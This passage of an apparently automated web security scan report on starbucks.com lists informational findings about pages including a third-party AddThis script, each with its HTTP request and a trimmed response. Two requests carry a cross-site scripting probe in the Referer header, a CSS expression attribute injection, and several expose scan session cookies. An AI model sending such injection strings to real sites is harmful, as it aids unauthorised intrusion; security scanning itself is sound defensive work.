GET /coffee/starbucks-natural-fusions/caramel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:57 GMT
Connection: close
Content-Length: 42234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/cinnamon HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:07 GMT
Connection: close
Content-Length: 42276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.15. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/savoring HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:46:29 GMT
Connection: close
Content-Length: 41023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.16. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-natural-fusions/vanilla HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:58 GMT
Connection: close
Content-Length: 42203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:50 GMT
Connection: close
Content-Length: 52528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:34 GMT
Connection: close
Content-Length: 42075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:38 GMT
Content-Length: 41729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.20. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:50 GMT
Connection: close
Content-Length: 42800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.21. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/nicaragua-corcasan

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/starbucks-reserve-coffee/nicaragua-corcasan HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:54 GMT
Connection: close
Content-Length: 42642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.22. http://www.starbucks.com/coffee/via  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:47 GMT
Connection: close
Content-Length: 51587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.23. http://www.starbucks.com/coffee/via/flavored-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via/flavored-coffee HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:17 GMT
Content-Length: 53500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.24. http://www.starbucks.com/coffee/via/instant-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/via/instant-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:47 GMT
Connection: close
Content-Length: 52979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.25. http://www.starbucks.com/coffee/whole-bean-coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:44:59 GMT
Connection: close
Content-Length: 53283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.26. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/africa-arabia HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:09 GMT
Connection: close
Content-Length: 41458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.27. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:28:53 GMT
Connection: close
Content-Length: 42370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.28. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/latin-america HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:19:08 GMT
Connection: close
Content-Length: 44303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/multi-region-blends HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:22:23 GMT
Connection: close
Content-Length: 42639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.30. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:52 GMT
Connection: close
Content-Length: 40860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.31. http://www.starbucks.com/coffeehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:28 GMT
Connection: close
Content-Length: 50861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
